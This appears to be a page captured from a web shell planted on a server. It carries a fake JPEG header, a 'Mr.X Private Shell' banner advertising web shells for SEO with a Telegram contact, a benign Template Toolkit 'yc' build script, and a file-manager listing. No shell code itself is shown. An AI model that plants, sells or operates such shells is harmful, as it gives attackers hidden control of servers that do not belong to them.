����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#!/bin/sh
#========================================================================
#
# yc - yapp compile
#
# This calls 'yapp', distributed with the Parse::Yapp module, to
# compile the parser grammar and construct the ../Template/Grammar.pm
# file. The grammar is defined in ./Parser.yp. The skeleton file
# Grammar.pm.skel is used as a template for creating the grammar file.
# An output file 'Parser.output' is generated containing a summary of
# the rule and state tables.
#
# You only need to run this script if you have changed the grammar and
# wish to recompile it.
#
# Andy Wardley <abw@wardley.org>
#
#========================================================================
: ${GRAMMAR:="Parser.yp"}
: ${OUTPUT:="../lib/Template/Grammar.pm"}
: ${TEMPLATE:="Grammar.pm.skel"}
echo "Compiling parser grammar (${GRAMMAR} -> ${OUTPUT})"
yapp -v -s -o ${OUTPUT} -t ${TEMPLATE} ${GRAMMAR}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| Grammar.pm.skel | File | 5.25 KB | 0644 |
|
| Parser.yp | File | 16.82 KB | 0644 |
|
| README | File | 3.25 KB | 0644 |
|
| yc | File | 906 B | 0755 |
|